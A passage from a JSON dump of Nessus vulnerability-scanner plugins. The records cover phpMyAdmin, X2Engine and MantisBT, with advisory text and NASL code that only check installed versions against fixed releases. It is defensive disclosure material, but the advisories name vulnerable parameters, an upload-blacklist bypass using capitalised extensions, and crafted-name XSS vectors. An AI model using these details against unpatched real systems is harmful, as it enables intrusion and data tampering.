else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-08-19T12:48:50", "description": "The phpMyAdmin development team reports :\n\nMultiple XSS vulnerabilities in browse table, ENUM editor, monitor, query charts and table relations pages.\n\nWith a crafted database, table or a primary/unique key column name it is possible to trigger an XSS when dropping a row from the table. With a crafted column name it is possible to trigger an XSS in the ENUM editor dialog. With a crafted variable name or a crafted value for unit field it is possible to trigger a self-XSS when adding a new chart in the monitor page. With a crafted value for x-axis label it is possible to trigger a self-XSS in the query chart page. With a crafted relation name it is possible to trigger an XSS in table relations page.\n\nXSS in view operations page.\n\nWith a crafted view name it is possible to trigger an XSS when dropping the view in view operation page.", "cvss3": {"score": null, "vector": null}, "published": "2014-08-18T00:00:00", "type": "nessus", "title": "FreeBSD : phpMyAdmin -- XSS vulnerabilities (fbb01289-2645-11e4-bc44-6805ca0b3d42)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-5273", "CVE-2014-5274"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:phpMyAdmin", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_FBB01289264511E4BC446805CA0B3D42.NASL", "href": "https://www.tenable.com/plugins/nessus/77235", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77235);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-5273\", \"CVE-2014-5274\");\n\n script_name(english:\"FreeBSD : phpMyAdmin -- XSS vulnerabilities (fbb01289-2645-11e4-bc44-6805ca0b3d42)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The phpMyAdmin development team reports :\n\nMultiple XSS vulnerabilities in browse table, ENUM editor, monitor,\nquery charts and table relations pages.\n\nWith a crafted database, table or a primary/unique key column name it\nis possible to trigger an XSS when dropping a row from the table. With\na crafted column name it is possible to trigger an XSS in the ENUM\neditor dialog. With a crafted variable name or a crafted value for\nunit field it is possible to trigger a self-XSS when adding a new\nchart in the monitor page. With a crafted value for x-axis label it is\npossible to trigger a self-XSS in the query chart page. With a crafted\nrelation name it is possible to trigger an XSS in table relations\npage.\n\nXSS in view operations page.\n\nWith a crafted view name it is possible to trigger an XSS when\ndropping the view in view operation page.\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2014-8.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2014-8/\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2014-9.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2014-9/\"\n );\n # https://vuxml.freebsd.org/freebsd/fbb01289-2645-11e4-bc44-6805ca0b3d42.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2d37ee31\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/08/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"phpMyAdmin>=4.2.0<4.2.7.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:pkg_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-08-19T12:49:17", "description": "Versions of phpMyAdmin earlier than 4.1.14.1 or 4.2.4 are affected by multiple cross-site scripting vulnerabilities, due to insufficient user input sanitation in the following areas :\n\n - Input related to Recent/Favorite table navigation.\n - Input of crafted table names, when hiding or unhiding a table in navigation.", "cvss3": {"score": 3.7, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"}, "published": "2014-06-30T00:00:00", "type": "nessus", "title": "phpMyAdmin 4.1.x < 4.1.14.1, 4.2.x < 4.2.4 Multiple XSS", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4349", "CVE-2014-4348"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:*"], "id": "8316.PRM", "href": "https://www.tenable.com/plugins/nnm/8316", "sourceData": "Binary data 8316.prm", "cvss": {"score": 4.3, "vector": "CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-08-19T12:50:03", "description": "The phpMyAdmin development team reports :\n\nSelf-XSS due to unescaped HTML output in recent/favorite tables navigation.\n\nWhen marking a crafted database or table name as favorite or having it in recent tables, it is possible to trigger an XSS.\n\nThis vulnerability can be triggered only by someone who logged in to phpMyAdmin, as the usual token protection prevents non-logged-in users from accessing the required form.\n\nSelf-XSS due to unescaped HTML output in navigation items hiding feature.\n\nWhen hiding or unhiding a crafted table name in the navigation, it is possible to trigger an XSS.\n\nThis vulnerability can be triggered only by someone who logged in to phpMyAdmin, as the usual token protection prevents non-logged-in users from accessing the required form.", "cvss3": {"score": null, "vector": null}, "published": "2014-06-23T00:00:00", "type": "nessus", "title": "FreeBSD : phpMyAdmin -- two XSS vulnerabilities due to unescaped db/table names (c4892644-f8c6-11e3-9f45-6805ca0b3d42)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4348", "CVE-2014-4349"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:phpMyAdmin", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_C4892644F8C611E39F456805CA0B3D42.NASL", "href": "https://www.tenable.com/plugins/nessus/76177", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76177);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-4348\", \"CVE-2014-4349\");\n\n script_name(english:\"FreeBSD : phpMyAdmin -- two XSS vulnerabilities due to unescaped db/table names (c4892644-f8c6-11e3-9f45-6805ca0b3d42)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The phpMyAdmin development team reports :\n\nSelf-XSS due to unescaped HTML output in recent/favorite tables\nnavigation.\n\nWhen marking a crafted database or table name as favorite or having it\nin recent tables, it is possible to trigger an XSS.\n\nThis vulnerability can be triggered only by someone who logged in to\nphpMyAdmin, as the usual token protection prevents non-logged-in users\nfrom accessing the required form.\n\nSelf-XSS due to unescaped HTML output in navigation items hiding\nfeature.\n\nWhen hiding or unhiding a crafted table name in the navigation, it is\npossible to trigger an XSS.\n\nThis vulnerability can be triggered only by someone who logged in to\nphpMyAdmin, as the usual token protection prevents non-logged-in users\nfrom accessing the required form.\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2014-2.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2014-2/\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2014-3.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2014-3/\"\n );\n # https://vuxml.freebsd.org/freebsd/c4892644-f8c6-11e3-9f45-6805ca0b3d42.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f7fba081\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/06/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"phpMyAdmin>=4.1.0<4.2.4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:pkg_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-08-19T12:48:59", "description": "Multiple vulnerabilities has been discovered and corrected in phpmyadmin :\n\nMultiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 4.2.x before 4.2.4 allow remote authenticated users to inject arbitrary web script or HTML via a crafted (1) database name or (2) table name that is improperly handled after presence in (a) the favorite list or (b) recent tables (CVE-2014-4348).\n\nMultiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 4.1.x before 4.1.14.1 and 4.2.x before 4.2.4 allow remote authenticated users to inject arbitrary web script or HTML via a crafted table name that is improperly handled after a (1) hide or (2) unhide action (CVE-2014-4349).\n\nThis upgrade provides the latest phpmyadmin version (4.2.5) to address these vulnerabilities.", "cvss3": {"score": null, "vector": null}, "published": "2014-07-09T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : phpmyadmin (MDVSA-2014:126)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4348", "CVE-2014-4349"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:phpmyadmin", "cpe:/o:mandriva:business_server:1"], "id": "MANDRIVA_MDVSA-2014-126.NASL", "href": "https://www.tenable.com/plugins/nessus/76423", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:126. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76423);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-4348\", \"CVE-2014-4349\");\n script_bugtraq_id(68201, 68205);\n script_xref(name:\"MDVSA\", value:\"2014:126\");\n\n script_name(english:\"Mandriva Linux Security Advisory : phpmyadmin (MDVSA-2014:126)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Mandriva Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities has been discovered and corrected in\nphpmyadmin :\n\nMultiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin\n4.2.x before 4.2.4 allow remote authenticated users to inject\narbitrary web script or HTML via a crafted (1) database name or (2)\ntable name that is improperly handled after presence in (a) the\nfavorite list or (b) recent tables (CVE-2014-4348).\n\nMultiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin\n4.1.x before 4.1.14.1 and 4.2.x before 4.2.4 allow remote\nauthenticated users to inject arbitrary web script or HTML via a\ncrafted table name that is improperly handled after a (1) hide or (2)\nunhide action (CVE-2014-4349).\n\nThis upgrade provides the latest phpmyadmin version (4.2.5) to address\nthese vulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://sourceforge.net/p/phpmyadmin/news/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2014-2.php\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2014-3.php\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpmyadmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:phpmyadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"phpmyadmin-4.2.5-1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2022-04-12T15:46:20", "description": "According to its version number, the X2Engine application installed on the remote web server is potentially affected by multiple vulnerabilities :\n\n - A PHP object injection vulnerability exists which can be used to carry out Server-Side Request Forgery (SSRF) attacks using specially crafted serialized objects. An attacker can exploit this issue by sending a crafted serialized request via the 'report' HTTP POST parameter of the 'SiteController.php' script. (CVE-2014-5297)\n\n - A file upload vulnerability exists in the script 'FileUploadsFilter.php' due to a case-sensitive file name check by the regex contained in the constant 'FileUploadsFilter::EXT_BLACKLIST'. An attacker, using a crafted file name with capital letters in the extension, can bypass file upload restrictions to load and execute arbitrary PHP scripts, provided the X2Engine is running under a case-insensitive file system or configuration.\n (CVE-2014-5298)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": null, "vector": null}, "published": "2015-02-23T00:00:00", "type": "nessus", "title": "X2Engine < 4.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-5297", "CVE-2014-5298"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:x2engine:x2engine"], "id": "X2ENGINE_4_2.NASL", "href": "https://www.tenable.com/plugins/nessus/81438", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81438);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2014-5297\", \"CVE-2014-5298\");\n script_bugtraq_id(70080, 70081);\n\n script_name(english:\"X2Engine < 4.2 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version number, the X2Engine application installed on\nthe remote web server is potentially affected by multiple\nvulnerabilities :\n\n - A PHP object injection vulnerability exists which can be\n used to carry out Server-Side Request Forgery (SSRF)\n attacks using specially crafted serialized objects. An\n attacker can exploit this issue by sending a crafted\n serialized request via the 'report' HTTP POST parameter\n of the 'SiteController.php' script. (CVE-2014-5297)\n\n - A file upload vulnerability exists in the script\n 'FileUploadsFilter.php' due to a case-sensitive file\n name check by the regex contained in the constant\n 'FileUploadsFilter::EXT_BLACKLIST'. An attacker, using a\n crafted file name with capital letters in the extension,\n can bypass file upload restrictions to load and execute\n arbitrary PHP scripts, provided the X2Engine is running\n under a case-insensitive file system or configuration.\n (CVE-2014-5298)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2014/Sep/77\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2014/Sep/78\");\n script_set_attribute(attribute:\"see_also\", value:\"http://community.x2crm.com/index.php\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/X2Engine/X2CRM/blob/master/CHANGELOG.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 4.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/23\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:x2engine:x2engine\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"x2engine_detect.nbin\");\n script_require_keys(\"www/PHP\", \"installed_sw/X2Engine\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"X2Engine\";\nfix = \"4.2\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\ndir = install['path'];\nversion = install['version'];\ninstall_url = build_url(port:port, qs:dir + \"/login\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nver = split(version, sep:\".\", keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\nif (\n (ver[0] < 4) ||\n (ver[0] == 4 && ver[1] < 2)\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' +install_url+\n '\\n Installed version : ' +version+\n '\\n Fixed version : ' +fix+\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-16T14:02:43", "description": "According to its version number, the MantisBT install hosted on the remote web server is 1.1.0 or later but prior to 1.2.16. It is, therefore, affected by multiple vulnerabilities:\n\n - A cross-site scripting flaw exists with the 'account_sponsor_page.php' where the 'project_id' parameter is not validated upon submission. This could allow a remote attacker to execute arbitrary script code within the browser / server trust relationship with a specially crafted request. (CVE-2013-4460)\n\n - A SQL injection flaw exists in the SOAP API with the 'db_query()' function where user-supplied input is not properly sanitized via the 'mc_issue_attachment_get' SOAP request. This could allow a remote attacker to inject or manipulate SQL queries, allowing for the manipulation or disclosure of arbitrary data. This issue affects version 1.1.0a4 or later. (CVE-2014-1608)\n\n - SQL injection flaws exists in 'core/news_api.php', 'core/summary_api.php', 'plugins/MantisGraph/core/graph_api.php', 'api/soap/mc_project_api.php', and 'proj_doc_page.php' pages. This could allow a remote attacker to inject or manipulate SQL queries, allowing for the manipulation or disclosure of arbitrary data. This issue only affects versions 1.2.0 - 1.2.15. (CVE-2014-1609)\n\nNote that Nessus has relied only on the self-reported version number and has not actually tried to exploit these issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-03-27T00:00:00", "type": "nessus", "title": "MantisBT 1.1.0 < 1.2.16 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4460", "CVE-2014-1608", "CVE-2014-1609"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:mantisbt:mantisbt"], "id": "MANTIS_1_2_16.NASL", "href": "https://www.tenable.com/plugins/nessus/73226", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73226);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-4460\", \"CVE-2014-1608\", \"CVE-2014-1609\");\n script_bugtraq_id(63273, 65445, 65461);\n\n script_name(english:\"MantisBT 1.1.0 < 1.2.16 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version number, the MantisBT install hosted on the\nremote web server is 1.1.0 or later but prior to 1.2.16. It is,\ntherefore, affected by multiple vulnerabilities:\n\n - A cross-site scripting flaw exists with the\n 'account_sponsor_page.php' where the 'project_id'\n parameter is not validated upon submission. This could\n allow a remote attacker to execute arbitrary script\n code within the browser / server trust relationship\n with a specially crafted request. (CVE-2013-4460)\n\n - A SQL injection flaw exists in the SOAP API with the\n 'db_query()' function where user-supplied input is not\n properly sanitized via the 'mc_issue_attachment_get'\n SOAP request. This could allow a remote attacker to\n inject or manipulate SQL queries, allowing for the\n manipulation or disclosure of arbitrary data. This issue\n affects version 1.1.0a4 or later. (CVE-2014-1608)\n\n - SQL injection flaws exists in\n 'core/news_api.php', 'core/summary_api.php',\n 'plugins/MantisGraph/core/graph_api.php',\n 'api/soap/mc_project_api.php', and 'proj_doc_page.php'\n pages. This could allow a remote attacker to inject or\n manipulate SQL queries, allowing for the manipulation or\n disclosure of arbitrary data. This issue only affects\n versions 1.2.0 - 1.2.15. (CVE-2014-1609)\n\nNote that Nessus has relied only on the self-reported version number\nand has not actually tried to exploit these issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mantisbt.org/blog/archives/mantisbt/275\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mantisbt.org/bugs/view.php?id=16513\");\n script_set_attribute(attribute:\"see_also\", 